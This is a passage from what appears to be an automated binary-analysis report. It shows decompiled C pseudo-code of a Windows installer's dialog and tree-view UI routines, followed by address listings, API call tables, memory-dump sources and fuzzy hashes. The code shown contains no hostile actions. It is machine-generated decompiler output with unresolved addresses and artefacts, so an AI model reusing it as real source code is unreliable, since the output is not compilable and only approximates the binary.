                                                                                                                                    							}
                                                                                                                                    							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                                                                    							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                                                                    								_t324 = 0x20;
                                                                                                                                    							}
                                                                                                                                    							E00401299(_t324);
                                                                                                                                    							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                                                                    							_a12 = _a12 | 0xffffffff;
                                                                                                                                    							_a16 = 0;
                                                                                                                                    							_a8 = 0x40f;
                                                                                                                                    							goto L56;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_v36 = 0;
                                                                                                                                    					 *0x42f4a0 = _a4;
                                                                                                                                    					_v20 = 2;
                                                                                                                                    					 *0x42a890 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                                                                                                    					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                                                                                                    					 *0x42a884 =  *0x42a884 | 0xffffffff;
                                                                                                                                    					_v16 = _t264;
                                                                                                                                    					 *0x42a88c = SetWindowLongA(_v8, 0xfffffffc, E00405201);
                                                                                                                                    					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                                                                    					 *0x42a87c = _t266;
                                                                                                                                    					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                                                                    					SendMessageA(_v8, 0x1109, 2,  *0x42a87c);
                                                                                                                                    					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                                                                    						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                                                                    					}
                                                                                                                                    					DeleteObject(_v16);
                                                                                                                                    					_t327 = 0;
                                                                                                                                    					do {
                                                                                                                                    						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                                                                    						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                                                                    							if(_t327 != 0x20) {
                                                                                                                                    								_v20 = 0;
                                                                                                                                    							}
                                                                                                                                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00406188(0, _t327, _t331, 0, _t272)), _t327);
                                                                                                                                    						}
                                                                                                                                    						_t327 = _t327 + 1;
                                                                                                                                    					} while (_t327 < 0x21);
                                                                                                                                    					_t328 = _a16;
                                                                                                                                    					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                                                                    					_push(0x15);
                                                                                                                                    					E004041F4(_a4);
                                                                                                                                    					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                                                                    					_push(0x16);
                                                                                                                                    					E004041F4(_a4);
                                                                                                                                    					_t329 = 0;
                                                                                                                                    					_v16 = 0;
                                                                                                                                    					if( *0x42f46c <= 0) {
                                                                                                                                    						L19:
                                                                                                                                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                    						goto L20;
                                                                                                                                    					} else {
                                                                                                                                    						_t316 = _v24 + 8;
                                                                                                                                    						_v32 = _t316;
                                                                                                                                    						do {
                                                                                                                                    							_t284 =  &(_t316[0x10]);
                                                                                                                                    							if( *_t284 != 0) {
                                                                                                                                    								_v64 = _t284;
                                                                                                                                    								_t285 =  *_t316;
                                                                                                                                    								_v88 = _v16;
                                                                                                                                    								_t308 = 0x20;
                                                                                                                                    								_v84 = 0xffff0002;
                                                                                                                                    								_v80 = 0xd;
                                                                                                                                    								_v68 = _t308;
                                                                                                                                    								_v44 = _t329;
                                                                                                                                    								_v72 = _t285 & _t308;
                                                                                                                                    								if((_t285 & 0x00000002) == 0) {
                                                                                                                                    									if((_t285 & 0x00000004) == 0) {
                                                                                                                                    										 *( *0x42a890 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                    									} else {
                                                                                                                                    										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_v80 = 0x4d;
                                                                                                                                    									_v48 = 1;
                                                                                                                                    									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                    									_v36 = 1;
                                                                                                                                    									 *( *0x42a890 + _t329 * 4) = _t290;
                                                                                                                                    									_v16 =  *( *0x42a890 + _t329 * 4);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							_t329 = _t329 + 1;
                                                                                                                                    							_t316 =  &(_v32[0x418]);
                                                                                                                                    							_v32 = _t316;
                                                                                                                                    						} while (_t329 <  *0x42f46c);
                                                                                                                                    						if(_v36 != 0) {
                                                                                                                                    							L20:
                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                    								E00404229(_v8);
                                                                                                                                    								goto L23;
                                                                                                                                    							} else {
                                                                                                                                    								ShowWindow(_v12, 5);
                                                                                                                                    								E00404229(_v12);
                                                                                                                                    								L91:
                                                                                                                                    								return E0040425B(_a8, _a12, _a16);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L19;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}


























































                                                                                                                                    0x00404f58
                                                                                                                                    0x00404f62
                                                                                                                                    0x00404f68
                                                                                                                                    0x00404f6b
                                                                                                                                    0x00404f6e
                                                                                                                                    0x00404f89
                                                                                                                                    0x00404f70
                                                                                                                                    0x00404f7a
                                                                                                                                    0x00404f7a
                                                                                                                                    0x00404f6e
                                                                                                                                    0x00404f62
                                                                                                                                    0x00000000
                                                                                                                                    0x00404f3c
                                                                                                                                    0x00404ec9
                                                                                                                                    0x00404ed4
                                                                                                                                    0x00404ed9
                                                                                                                                    0x00404ee0
                                                                                                                                    0x00404ee5
                                                                                                                                    0x00404ee9
                                                                                                                                    0x00404ef4
                                                                                                                                    0x00404ef4
                                                                                                                                    0x00404ef8
                                                                                                                                    0x00404efc
                                                                                                                                    0x00404f00
                                                                                                                                    0x00404f13
                                                                                                                                    0x00404f02
                                                                                                                                    0x00404f02
                                                                                                                                    0x00404f09
                                                                                                                                    0x00404f0f
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f09
                                                                                                                                    0x00404f17
                                                                                                                                    0x00404f19
                                                                                                                                    0x00404f2c
                                                                                                                                    0x00404f2f
                                                                                                                                    0x00404f32
                                                                                                                                    0x00404f32
                                                                                                                                    0x00404efc
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ee9
                                                                                                                                    0x00404ecb
                                                                                                                                    0x00404ed2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404f8c
                                                                                                                                    0x00404f8c
                                                                                                                                    0x00404f93
                                                                                                                                    0x00405004
                                                                                                                                    0x0040500c
                                                                                                                                    0x00405014
                                                                                                                                    0x00405014
                                                                                                                                    0x0040501d
                                                                                                                                    0x0040501f
                                                                                                                                    0x00405026
                                                                                                                                    0x00405029
                                                                                                                                    0x00405029
                                                                                                                                    0x0040502f
                                                                                                                                    0x00405036
                                                                                                                                    0x00405039
                                                                                                                                    0x00405039
                                                                                                                                    0x0040503f
                                                                                                                                    0x00405045
                                                                                                                                    0x0040504b
                                                                                                                                    0x0040504b
                                                                                                                                    0x00405058
                                                                                                                                    0x004051ae
                                                                                                                                    0x004051b5
                                                                                                                                    0x004051d2
                                                                                                                                    0x004051d8
                                                                                                                                    0x004051ea
                                                                                                                                    0x004051ea
                                                                                                                                    0x00000000
                                                                                                                                    0x0040505e
                                                                                                                                    0x00405060
                                                                                                                                    0x00405065
                                                                                                                                    0x0040506a
                                                                                                                                    0x0040506f
                                                                                                                                    0x00405071
                                                                                                                                    0x00405071
                                                                                                                                    0x00405072
                                                                                                                                    0x00405073
                                                                                                                                    0x00405075
                                                                                                                                    0x00405075
                                                                                                                                    0x0040507d
                                                                                                                                    0x004050be
                                                                                                                                    0x004050c0
                                                                                                                                    0x004050d0
                                                                                                                                    0x004050d3
                                                                                                                                    0x004050d8
                                                                                                                                    0x004050df
                                                                                                                                    0x004050e2
                                                                                                                                    0x00405184
                                                                                                                                    0x0040518a
                                                                                                                                    0x00405190
                                                                                                                                    0x00405198
                                                                                                                                    0x004051a9
                                                                                                                                    0x004051a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00405198
                                                                                                                                    0x004050e8
                                                                                                                                    0x004050eb
                                                                                                                                    0x004050f1
                                                                                                                                    0x004050f6
                                                                                                                                    0x004050f8
                                                                                                                                    0x004050fa
                                                                                                                                    0x00405100
                                                                                                                                    0x00405107
                                                                                                                                    0x0040510c
                                                                                                                                    0x00405113
                                                                                                                                    0x00405116
                                                                                                                                    0x00405116
                                                                                                                                    0x0040511d
                                                                                                                                    0x00405129
                                                                                                                                    0x0040512d
                                                                                                                                    0x0040512f
                                                                                                                                    0x0040512f
                                                                                                                                    0x0040511f
                                                                                                                                    0x00405121
                                                                                                                                    0x00405121
                                                                                                                                    0x0040514f
                                                                                                                                    0x0040515b
                                                                                                                                    0x0040516a
                                                                                                                                    0x0040516a
                                                                                                                                    0x0040516c
                                                                                                                                    0x0040516f
                                                                                                                                    0x00405178
                                                                                                                                    0x00000000
                                                                                                                                    0x0040507f
                                                                                                                                    0x0040508a
                                                                                                                                    0x0040508d
                                                                                                                                    0x00405092
                                                                                                                                    0x00405094
                                                                                                                                    0x00405098
                                                                                                                                    0x004050a8
                                                                                                                                    0x004050b2
                                                                                                                                    0x004050b4
                                                                                                                                    0x004050b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040509a
                                                                                                                                    0x0040509a
                                                                                                                                    0x004050a0
                                                                                                                                    0x004050a2
                                                                                                                                    0x004050a2
                                                                                                                                    0x004050a3
                                                                                                                                    0x004050a4
                                                                                                                                    0x00000000
                                                                                                                                    0x0040509a
                                                                                                                                    0x0040507d
                                                                                                                                    0x00405058
                                                                                                                                    0x00404f9b
                                                                                                                                    0x00000000
                                                                                                                                    0x00404fb1
                                                                                                                                    0x00404fbb
                                                                                                                                    0x00404fc0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404fd2
                                                                                                                                    0x00404fd7
                                                                                                                                    0x00404fe3
                                                                                                                                    0x00404fe3
                                                                                                                                    0x00404fe5
                                                                                                                                    0x00404ff4
                                                                                                                                    0x00404ff6
                                                                                                                                    0x00404ffa
                                                                                                                                    0x00404ffd
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ffd
                                                                                                                                    0x00404f9b
                                                                                                                                    0x00404c4f
                                                                                                                                    0x00404c52
                                                                                                                                    0x00404c55
                                                                                                                                    0x00404c65
                                                                                                                                    0x00404c78
                                                                                                                                    0x00404c83
                                                                                                                                    0x00404c89
                                                                                                                                    0x00404c97
                                                                                                                                    0x00404caa
                                                                                                                                    0x00404caf
                                                                                                                                    0x00404cba
                                                                                                                                    0x00404cc3
                                                                                                                                    0x00404cd9
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404cf5
                                                                                                                                    0x00404cf5
                                                                                                                                    0x00404cfa
                                                                                                                                    0x00404d00
                                                                                                                                    0x00404d02

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 00404C10
                                                                                                                                    • GetDlgItem.USER32 ref: 00404C1D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C6C
                                                                                                                                    • LoadImageA.USER32 ref: 00404C83
                                                                                                                                    • SetWindowLongA.USER32 ref: 00404C9D
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CAF
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404CC3
                                                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404CD9
                                                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CE5
                                                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CF5
                                                                                                                                    • DeleteObject.GDI32(00000110), ref: 00404CFA
                                                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D25
                                                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D31
                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DCB
                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DFB
                                                                                                                                      • Part of subcall function 00404229: SendMessageA.USER32(00000028,?,00000001,00404059), ref: 00404237
                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E0F
                                                                                                                                    • GetWindowLongA.USER32 ref: 00404E3D
                                                                                                                                    • SetWindowLongA.USER32 ref: 00404E4B
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404E5B
                                                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F56
                                                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404FBB
                                                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FD0
                                                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FF4
                                                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00405014
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405029
                                                                                                                                    • GlobalFree.KERNEL32 ref: 00405039
                                                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004050B2
                                                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 0040515B
                                                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040516A
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040518A
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004051D8
                                                                                                                                    • GetDlgItem.USER32 ref: 004051E3
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004051EA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                    • Opcode ID: e792091cbd0f5f6b38c64874a5f59de6389cc8b9065b320a4a01fe7e62073599
                                                                                                                                    • Instruction ID: 26b408d2065fced8b3aa27b558790843a3ecfca43f1cc7f5e0793415f51e586f
                                                                                                                                    • Opcode Fuzzy Hash: e792091cbd0f5f6b38c64874a5f59de6389cc8b9065b320a4a01fe7e62073599
                                                                                                                                    • Instruction Fuzzy Hash: 79025CB0A00209AFDB20DF54CD45AAE7BB9FB44314F50813AFA14BA2E1C7789D52CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E00403D20(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                    				struct HWND__* _v32;
                                                                                                                                    				void* _v80;
                                                                                                                                    				void* _v84;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t35;
                                                                                                                                    				signed int _t37;
                                                                                                                                    				signed int _t39;
                                                                                                                                    				struct HWND__* _t49;
                                                                                                                                    				signed int _t68;
                                                                                                                                    				struct HWND__* _t74;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				struct HWND__* _t92;
                                                                                                                                    				signed int _t100;
                                                                                                                                    				int _t104;
                                                                                                                                    				signed int _t116;
                                                                                                                                    				signed int _t117;
                                                                                                                                    				int _t118;
                                                                                                                                    				signed int _t123;
                                                                                                                                    				struct HWND__* _t126;
                                                                                                                                    				struct HWND__* _t127;
                                                                                                                                    				int _t128;
                                                                                                                                    				long _t131;
                                                                                                                                    				int _t133;
                                                                                                                                    				int _t134;
                                                                                                                                    				void* _t135;
                                                                                                                                    				void* _t143;
                                                                                                                                    
                                                                                                                                    				_t116 = _a8;
                                                                                                                                    				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                                                                    					_t35 = _a12;
                                                                                                                                    					_t126 = _a4;
                                                                                                                                    					__eflags = _t116 - 0x110;
                                                                                                                                    					 *0x42a880 = _t35;
                                                                                                                                    					if(_t116 == 0x110) {
                                                                                                                                    						 *0x42f428 = _t126;
                                                                                                                                    						 *0x42a894 = GetDlgItem(_t126, 1);
                                                                                                                                    						_t92 = GetDlgItem(_t126, 2);
                                                                                                                                    						_push(0xffffffff);
                                                                                                                                    						_push(0x1c);
                                                                                                                                    						 *0x429860 = _t92;
                                                                                                                                    						E004041F4(_t126);
                                                                                                                                    						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
                                                                                                                                    						 *0x42ebec = E0040140B(4);
                                                                                                                                    						_t35 = 1;
                                                                                                                                    						__eflags = 1;
                                                                                                                                    						 *0x42a880 = 1;
                                                                                                                                    					}
                                                                                                                                    					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                                                                    					_t134 = 0;
                                                                                                                                    					_t131 = (_t123 << 6) +  *0x42f460;
                                                                                                                                    					__eflags = _t123;
                                                                                                                                    					if(_t123 < 0) {
                                                                                                                                    						L34:
                                                                                                                                    						E00404240(0x40b);
                                                                                                                                    						while(1) {
                                                                                                                                    							_t37 =  *0x42a880;
                                                                                                                                    							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                                                                    							_t131 = _t131 + (_t37 << 6);
                                                                                                                                    							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                                                                    							__eflags = _t39 -  *0x42f464;
                                                                                                                                    							if(_t39 ==  *0x42f464) {
                                                                                                                                    								E0040140B(1);
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *0x42ebec - _t134; // 0x1
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *0x40a1f8 -  *0x42f464; // 0xffffffff
                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t117 =  *(_t131 + 0x14);
                                                                                                                                    							E00406188(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                                                                    							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                                                    							_push(0xfffffc19);
                                                                                                                                    							E004041F4(_t126);
                                                                                                                                    							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                                                                    							_push(0xfffffc1b);
                                                                                                                                    							E004041F4(_t126);
                                                                                                                                    							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                                                                    							_push(0xfffffc1a);
                                                                                                                                    							E004041F4(_t126);
                                                                                                                                    							_t49 = GetDlgItem(_t126, 3);
                                                                                                                                    							__eflags =  *0x42f4cc - _t134;
                                                                                                                                    							_v32 = _t49;
                                                                                                                                    							if( *0x42f4cc != _t134) {
                                                                                                                                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                                    								__eflags = _t117;
                                                                                                                                    							}
                                                                                                                                    							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                                                                    							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                                                                    							E00404216(_t117 & 0x00000002);
                                                                                                                                    							_t118 = _t117 & 0x00000004;
                                                                                                                                    							EnableWindow( *0x429860, _t118);
                                                                                                                                    							__eflags = _t118 - _t134;
                                                                                                                                    							if(_t118 == _t134) {
                                                                                                                                    								_push(1);
                                                                                                                                    							} else {
                                                                                                                                    								_push(_t134);
                                                                                                                                    							}
                                                                                                                                    							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                                                                    							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                                                                    							__eflags =  *0x42f4cc - _t134;
                                                                                                                                    							if( *0x42f4cc == _t134) {
                                                                                                                                    								_push( *0x42a894);
                                                                                                                                    							} else {
                                                                                                                                    								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                                                                    								_push( *0x429860);
                                                                                                                                    							}
                                                                                                                                    							E00404229();
                                                                                                                                    							E00406166(0x42a898, E00403D01());
                                                                                                                                    							E00406188(0x42a898, _t126, _t131,  &(0x42a898[lstrlenA(0x42a898)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                                                                    							SetWindowTextA(_t126, 0x42a898);
                                                                                                                                    							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
                                                                                                                                    							__eflags = _t68;
                                                                                                                                    							if(_t68 != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags =  *_t131 - _t134;
                                                                                                                                    								if( *_t131 == _t134) {
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								__eflags =  *(_t131 + 4) - 5;
                                                                                                                                    								if( *(_t131 + 4) != 5) {
                                                                                                                                    									DestroyWindow( *0x42ebf8);
                                                                                                                                    									 *0x42a070 = _t131;
                                                                                                                                    									__eflags =  *_t131 - _t134;
                                                                                                                                    									if( *_t131 <= _t134) {
                                                                                                                                    										goto L58;
                                                                                                                                    									}
                                                                                                                                    									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                                                                    									__eflags = _t74 - _t134;
                                                                                                                                    									 *0x42ebf8 = _t74;
                                                                                                                                    									if(_t74 == _t134) {
                                                                                                                                    										goto L58;
                                                                                                                                    									}
                                                                                                                                    									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                                                                    									_push(6);
                                                                                                                                    									E004041F4(_t74);
                                                                                                                                    									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                                                                    									ScreenToClient(_t126, _t135 + 0x10);
                                                                                                                                    									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                                                                    									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
                                                                                                                                    									__eflags =  *0x42ebec - _t134; // 0x1
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										goto L61;
                                                                                                                                    									}
                                                                                                                                    									ShowWindow( *0x42ebf8, 8);
                                                                                                                                    									E00404240(0x405);
                                                                                                                                    									goto L58;
                                                                                                                                    								}
                                                                                                                                    								__eflags =  *0x42f4cc - _t134;
                                                                                                                                    								if( *0x42f4cc != _t134) {
                                                                                                                                    									goto L61;
                                                                                                                                    								}
                                                                                                                                    								__eflags =  *0x42f4c0 - _t134;
                                                                                                                                    								if( *0x42f4c0 != _t134) {
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								goto L61;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						DestroyWindow( *0x42ebf8);
                                                                                                                                    						 *0x42f428 = _t134;
                                                                                                                                    						EndDialog(_t126,  *0x429c68);
                                                                                                                                    						goto L58;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags = _t35 - 1;
                                                                                                                                    						if(_t35 != 1) {
                                                                                                                                    							L33:
                                                                                                                                    							__eflags =  *_t131 - _t134;
                                                                                                                                    							if( *_t131 == _t134) {
                                                                                                                                    								goto L61;
                                                                                                                                    							}
                                                                                                                                    							goto L34;
                                                                                                                                    						}
                                                                                                                                    						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
                                                                                                                                    						__eflags = _t87;
                                                                                                                                    						if(_t87 == 0) {
                                                                                                                                    							goto L33;
                                                                                                                                    						}
                                                                                                                                    						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                                                                                                    						__eflags =  *0x42ebec - _t134; // 0x1
                                                                                                                                    						return 0 | __eflags == 0x00000000;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t126 = _a4;
                                                                                                                                    					_t134 = 0;
                                                                                                                                    					if(_t116 == 0x47) {
                                                                                                                                    						SetWindowPos( *0x42a878, _t126, 0, 0, 0, 0, 0x13);
                                                                                                                                    					}
                                                                                                                                    					if(_t116 == 5) {
                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                    						ShowWindow( *0x42a878,  ~(_a12 - 1) & _t116);
                                                                                                                                    					}
                                                                                                                                    					if(_t116 != 0x40d) {
                                                                                                                                    						__eflags = _t116 - 0x11;
                                                                                                                                    						if(_t116 != 0x11) {
                                                                                                                                    							__eflags = _t116 - 0x111;
                                                                                                                                    							if(_t116 != 0x111) {
                                                                                                                                    								L26:
                                                                                                                                    								return E0040425B(_t116, _a12, _a16);
                                                                                                                                    							}
                                                                                                                                    							_t133 = _a12 & 0x0000ffff;
                                                                                                                                    							_t127 = GetDlgItem(_t126, _t133);
                                                                                                                                    							__eflags = _t127 - _t134;
                                                                                                                                    							if(_t127 == _t134) {
                                                                                                                                    								L13:
                                                                                                                                    								__eflags = _t133 - 1;
                                                                                                                                    								if(_t133 != 1) {
                                                                                                                                    									__eflags = _t133 - 3;
                                                                                                                                    									if(_t133 != 3) {
                                                                                                                                    										_t128 = 2;
                                                                                                                                    										__eflags = _t133 - _t128;
                                                                                                                                    										if(_t133 != _t128) {
                                                                                                                                    											L25:
                                                                                                                                    											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                                                                                                    											goto L26;
                                                                                                                                    										}
                                                                                                                                    										__eflags =  *0x42f4cc - _t134;
                                                                                                                                    										if( *0x42f4cc == _t134) {
                                                                                                                                    											_t100 = E0040140B(3);
                                                                                                                                    											__eflags = _t100;
                                                                                                                                    											if(_t100 != 0) {
                                                                                                                                    												goto L26;
                                                                                                                                    											}
                                                                                                                                    											 *0x429c68 = 1;
                                                                                                                                    											L21:
                                                                                                                                    											_push(0x78);
                                                                                                                                    											L22:
                                                                                                                                    											E004041CD();
                                                                                                                                    											goto L26;
                                                                                                                                    										}
                                                                                                                                    										E0040140B(_t128);
                                                                                                                                    										 *0x429c68 = _t128;
                                                                                                                                    										goto L21;
                                                                                                                                    									}
                                                                                                                                    									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                                                                    									if(__eflags <= 0) {
                                                                                                                                    										goto L25;
                                                                                                                                    									}
                                                                                                                                    									_push(0xffffffff);
                                                                                                                                    									goto L22;
                                                                                                                                    								}
                                                                                                                                    								_push(_t133);
                                                                                                                                    								goto L22;
                                                                                                                                    							}
                                                                                                                                    							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                                                                    							_t104 = IsWindowEnabled(_t127);
                                                                                                                                    							__eflags = _t104;
                                                                                                                                    							if(_t104 == 0) {
                                                                                                                                    								goto L61;
                                                                                                                                    							}
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						SetWindowLongA(_t126, _t134, _t134);
                                                                                                                                    						return 1;
                                                                                                                                    					} else {
                                                                                                                                    						DestroyWindow( *0x42ebf8);
                                                                                                                                    						 *0x42ebf8 = _a12;
                                                                                                                                    						L58:
                                                                                                                                    						if( *0x42b898 == _t134) {
                                                                                                                                    							_t143 =  *0x42ebf8 - _t134; // 0x0
                                                                                                                                    							if(_t143 != 0) {
                                                                                                                                    								ShowWindow(_t126, 0xa);
                                                                                                                                    								 *0x42b898 = 1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L61:
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}































                                                                                                                                    0x00403ed7
                                                                                                                                    0x00403ede
                                                                                                                                    0x00403ee4
                                                                                                                                    0x00403ee6
                                                                                                                                    0x00403f26
                                                                                                                                    0x00403f2b
                                                                                                                                    0x00403f30
                                                                                                                                    0x00403f30
                                                                                                                                    0x00403f35
                                                                                                                                    0x00403f3e
                                                                                                                                    0x00403f40
                                                                                                                                    0x00403f45
                                                                                                                                    0x00403f4b
                                                                                                                                    0x00403f4f
                                                                                                                                    0x00403f4f
                                                                                                                                    0x00403f54
                                                                                                                                    0x00403f5a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f65
                                                                                                                                    0x00403f6b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f74
                                                                                                                                    0x00403f7c
                                                                                                                                    0x00403f81
                                                                                                                                    0x00403f84
                                                                                                                                    0x00403f8a
                                                                                                                                    0x00403f8f
                                                                                                                                    0x00403f92
                                                                                                                                    0x00403f98
                                                                                                                                    0x00403f9d
                                                                                                                                    0x00403fa0
                                                                                                                                    0x00403fa6
                                                                                                                                    0x00403fae
                                                                                                                                    0x00403fb4
                                                                                                                                    0x00403fba
                                                                                                                                    0x00403fbe
                                                                                                                                    0x00403fc5
